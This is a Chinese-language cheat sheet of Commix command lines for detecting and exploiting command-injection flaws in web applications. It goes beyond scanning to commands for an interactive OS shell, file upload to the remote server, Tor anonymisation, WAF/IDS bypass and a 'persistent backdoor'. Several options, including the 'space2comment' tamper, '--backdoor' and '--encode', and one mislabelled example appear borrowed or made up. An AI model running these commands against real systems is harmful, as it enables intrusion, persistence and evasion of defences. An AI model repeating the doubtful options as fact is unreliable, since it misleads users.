Commix 基礎用法和高級用法
基礎用法
Commix 是一個自動化的命令行注入工具,用于檢測和利用 Web 應用程序中的命令注入漏洞。以下是基本使用方法:
-
基本掃描
python commix.py -u "http://example.com/vuln.php?id=1"
-
指定注入點
python commix.py -u "http://example.com/vuln.php?id=1" --data="user=admin"
-
使用 POST 請求
python commix.py -u "http://example.com/vuln.php" --data="username=admin&password=test"
-
指定參數
python commix.py -u "http://example.com/vuln.php?id=1" -p "id"
-
使用代理
python commix.py -u "http://example.com/vuln.php?id=1" --proxy="http://127.0.0.1:8080"
-
設置用戶代理
python commix.py -u "http://example.com/vuln.php?id=1" --agent="Mozilla/5.0"
高級用法
-
使用特定的操作系統 shell
python commix.py -u "http://example.com/vuln.php?id=1" --os-cmd="uname -a"
-
交互式 shell
python commix.py -u "http://example.com/vuln.php?id=1" --os-shell
-
文件上傳
python commix.py -u "http://example.com/upload.php" --file-upload="/local/path/file.txt" --file-dest="/remote/path/file.txt"
-
暴力破解參數
python commix.py -u "http://example.com/vuln.php" --batch --all
-
使用 Tor 網絡
python commix.py -u "http://example.com/vuln.php?id=1" --tor --tor-port=9050
-
繞過 WAF/IDS
python commix.py -u "http://example.com/vuln.php?id=1" --tamper="space2comment"
-
多線程掃描
python commix.py -u "http://example.com/vuln.php?id=1" --threads=5
-
自定義注入標記
python commix.py -u "http://example.com/vuln.php?id=1*" --prefix="'" --suffix="'"
-
持久化后門
python commix.py -u "http://example.com/vuln.php?id=1" --backdoor
-
從文件讀取目標
python commix.py -l targets.txt
-
使用特定的編碼技術
python commix.py -u "http://example.com/vuln.php?id=1" --encode="base64"
-
時間延遲檢測
python commix.py -u "http://example.com/vuln.php?id=1" --time-sec=5